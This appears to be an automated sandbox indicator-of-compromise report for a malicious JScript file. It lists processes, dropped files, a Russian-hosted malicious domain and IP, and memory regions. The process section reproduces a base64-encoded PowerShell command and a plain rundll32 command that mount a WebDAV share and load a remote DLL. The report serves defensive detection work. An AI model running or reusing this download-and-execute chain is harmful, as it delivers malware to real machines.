IOC Report
2811271181036830236.js

loading gif

Files

File Path
Type
Category
Malicious
2811271181036830236.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i4bzgp0.glw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoxmpbyq.jut.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2811271181036830236.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA1ADEANwAxADMAMAA4ADcANAAyADcAMgA1ADkALgBkAGwAbAAsAEUAbgB0AHIAeQA=
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\51713087427259.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\

URLs

Name
IP
Malicious
http://apitestlabs.com:8888/
unknown
https://aka.ms/pscore6
unknown
https://aka.ms/pscore68
unknown
http://apitestlabs.com:8888/ce
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown

Domains

Name
IP
Malicious
apitestlabs.com
94.159.113.48
malicious
bg.microsoft.map.fastly.net
199.232.210.172

IPs

IP
Domain
Country
Malicious
94.159.113.48
apitestlabs.com
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
1E970FB0000
heap
page read and write
1E971075000
heap
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
7FFD9BC80000
trusted library allocation
page read and write
20EBBFE000
stack
page read and write
D9AB6FE000
stack
page read and write
1E972E37000
heap
page read and write
A5B1B1E000
stack
page read and write
1E972E53000
heap
page read and write
2028A5A0000
heap
page read and write
1D79B46E000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
1E972E40000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1D79D78E000
trusted library allocation
page read and write
1E972E4B000
heap
page read and write
1E972E38000
heap
page read and write
1D79B6E0000
heap
page read and write
20287225000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
20287208000
heap
page read and write
F96CF1E000
stack
page read and write
1E970F90000
heap
page read and write
2802E9CE000
heap
page read and write
1E972E37000
heap
page read and write
1E972E26000
heap
page read and write
1D7B55E0000
heap
page read and write
2802EA15000
heap
page read and write
1E972E4B000
heap
page read and write
1D7B5457000
heap
page read and write
2802E9CE000
heap
page read and write
20EBFB7000
stack
page read and write
1D79B450000
heap
page read and write
20EC1BE000
stack
page read and write
1D79B6C0000
trusted library allocation
page read and write
1E972E1B000
heap
page read and write
1E972E4B000
heap
page read and write
1E97116D000
heap
page read and write
1D79CF40000
heap
page execute and read and write
7FFD9BC20000
trusted library allocation
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
20EBE7F000
stack
page read and write
20287230000
heap
page read and write
1E972E11000
heap
page read and write
1E972E12000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1E972E55000
heap
page read and write
1D7B53F0000
heap
page execute and read and write
20EBAFE000
stack
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
2028722B000
heap
page read and write
2802E9A8000
heap
page read and write
1E972E23000
heap
page read and write
1D79B49B000
heap
page read and write
1E97316F000
heap
page read and write
2028721B000
heap
page read and write
7FFD9BB6A000
trusted library allocation
page read and write
2028746B000
heap
page read and write
2802EA17000
heap
page read and write
20EBD7E000
stack
page read and write
1E972E1F000
heap
page read and write
1E97116B000
heap
page read and write
1E972E26000
heap
page read and write
1D79D3D0000
trusted library allocation
page read and write
F96CF9F000
stack
page read and write
1E972E18000
heap
page read and write
1E972E2C000
heap
page read and write
1D79B491000
heap
page read and write
D9AB9FE000
stack
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
20EC2BE000
stack
page read and write
1D79D7C4000
trusted library allocation
page read and write
7FFD9BB92000
trusted library allocation
page read and write
1D79D41D000
trusted library allocation
page read and write
F96D37E000
stack
page read and write
1D79B640000
heap
page read and write
20287236000
heap
page read and write
1D79D766000
trusted library allocation
page read and write
1D79B6A0000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1E972E4B000
heap
page read and write
7FFD9BB61000
trusted library allocation
page read and write
1E972E4B000
heap
page read and write
202871D0000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
A5B1A9A000
stack
page read and write
1E972E1C000
heap
page read and write
2802EB25000
heap
page read and write
1D7B56E0000
heap
page read and write
1E972AC0000
heap
page read and write
1D79B680000
trusted library allocation
page read and write
F96D2FC000
stack
page read and write
202873D0000
heap
page read and write
1E972E58000
heap
page read and write
1E972E26000
heap
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
1D79B6B0000
heap
page readonly
D9AB4F5000
stack
page read and write
1E972E34000
heap
page read and write
1E972E26000
heap
page read and write
1E972E37000
heap
page read and write
1E972E37000
heap
page read and write
1E972E12000
heap
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
20EBCFC000
stack
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
7FFD9B9B2000
trusted library allocation
page read and write
20287465000
heap
page read and write
1D79B705000
heap
page read and write
20EBDFE000
stack
page read and write
1D7B56C0000
heap
page execute and read and write
2028A693000
heap
page read and write
1E973169000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1E972E40000
heap
page read and write
2802E9CC000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
20287200000
heap
page read and write
1D7B5722000
heap
page read and write
2802EA05000
heap
page read and write
1D79B400000
heap
page read and write
1E9736FF000
heap
page read and write
20EBB7E000
stack
page read and write
1E972E26000
heap
page read and write
7DF4D5330000
trusted library allocation
page execute and read and write
20287225000
heap
page read and write
1D79D2E1000
trusted library allocation
page read and write
2802EA00000
heap
page read and write
2028720F000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page read and write
2802EB20000
heap
page read and write
F96CE9A000
stack
page read and write
20287241000
heap
page read and write
2802E9E5000
heap
page read and write
1D79D2C1000
trusted library allocation
page read and write
1D79B410000
heap
page read and write
1D79D2DB000
trusted library allocation
page read and write
2802EA15000
heap
page read and write
1E972E56000
heap
page read and write
1E972E5F000
heap
page read and write
2802E970000
remote allocation
page read and write
1D7B54AC000
heap
page read and write
1D7B56F0000
heap
page read and write
2802E9DB000
heap
page read and write
1E972E53000
heap
page read and write
20287249000
heap
page read and write
1E972E5B000
heap
page read and write
2802E9F8000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
20EC037000
stack
page read and write
2028722C000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1E9733A2000
heap
page read and write
1E972E4B000
heap
page read and write
2802E9FE000
heap
page read and write
1E972E5F000
heap
page read and write
2802E900000
heap
page read and write
1D7B56F4000
heap
page read and write
20EBEF9000
stack
page read and write
1E972E24000
heap
page read and write
1D7AD332000
trusted library allocation
page read and write
2028722B000
heap
page read and write
1E971160000
heap
page read and write
1D79B48D000
heap
page read and write
1E971165000
heap
page read and write
2802EA04000
heap
page read and write
D9ABCFE000
stack
page read and write
1E972E5E000
heap
page read and write
2028723C000
heap
page read and write
2028721B000
heap
page read and write
1D7B550B000
heap
page read and write
1D79D678000
trusted library allocation
page read and write
1E972E17000
heap
page read and write
1D79D78C000
trusted library allocation
page read and write
20287460000
heap
page read and write
2802E9D4000
heap
page read and write
1E972F33000
heap
page read and write
20EC0BC000
stack
page read and write
1D79D3CD000
trusted library allocation
page read and write
1D79D3E1000
trusted library allocation
page read and write
1D7B5513000
heap
page read and write
F96D27B000
stack
page read and write
1D79B700000
heap
page read and write
2802E970000
remote allocation
page read and write
20EC13F000
stack
page read and write
2028AAE0000
trusted library allocation
page read and write
1D79CF70000
heap
page read and write
1E972E17000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
2802EA15000
heap
page read and write
7FFD9BC70000
trusted library allocation
page read and write
20EBC7E000
stack
page read and write
2802E920000
heap
page read and write
2802EA0B000
heap
page read and write
D9ABBFE000
stack
page read and write
1E972E5C000
heap
page read and write
20287218000
heap
page read and write
1E970FF0000
heap
page read and write
2802EA0B000
heap
page read and write
1E972E62000
heap
page read and write
1E972E48000
heap
page read and write
D9AB5FE000
stack
page read and write
2802E9D0000
heap
page read and write
1E97116D000
heap
page read and write
1E972E37000
heap
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
20EC23E000
stack
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
20287220000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
1E97116D000
heap
page read and write
1D79D35B000
trusted library allocation
page read and write
A5B1B9E000
stack
page read and write
20288D50000
heap
page read and write
1E972E2F000
heap
page read and write
1E972E2C000
heap
page read and write
1D79B430000
heap
page read and write
1D7B54AA000
heap
page read and write
2802E9F8000
heap
page read and write
1E972E3C000
heap
page read and write
D9ABAFE000
stack
page read and write
1E972E37000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
1D7AD2C1000
trusted library allocation
page read and write
2802E9E5000
heap
page read and write
2802E9CC000
heap
page read and write
2028723C000
heap
page read and write
2802E820000
heap
page read and write
1E972E28000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
20EC33B000
stack
page read and write
1E972E10000
heap
page read and write
20EBF3E000
stack
page read and write
1D7AD2D0000
trusted library allocation
page read and write
20287221000
heap
page read and write
D9AB8FE000
stack
page read and write
1D79D417000
trusted library allocation
page read and write
1D7B5489000
heap
page read and write
1D79D3D3000
trusted library allocation
page read and write
1D79D32B000
trusted library allocation
page read and write
1E972E4B000
heap
page read and write
1D79B4AD000
heap
page read and write
1D7B554C000
heap
page read and write
1E970EB0000
heap
page read and write
1E972E37000
heap
page read and write
1E972E27000
heap
page read and write
1E972E37000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
1D7B5537000
heap
page read and write
1E972E26000
heap
page read and write
1D7B553B000
heap
page read and write
D9ABEFB000
stack
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
1D79B52C000
heap
page read and write
1E9733A0000
heap
page read and write
1E97116B000
heap
page read and write
2028A690000
heap
page read and write
1D7B547C000
heap
page read and write
1D7B53F7000
heap
page execute and read and write
1E972E53000
heap
page read and write
2802E9A0000
heap
page read and write
202871E0000
heap
page read and write
1D7B5450000
heap
page read and write
1E972E14000
heap
page read and write
1D7B59F0000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
1E972E48000
heap
page read and write
1D7B5511000
heap
page read and write
2802EA0B000
heap
page read and write
1D79CF75000
heap
page read and write
1E972E20000
heap
page read and write
20EBA73000
stack
page read and write
1D79B4D5000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
2802E9D0000
heap
page read and write
2802E970000
remote allocation
page read and write
There are 268 hidden memdumps, click here to show them.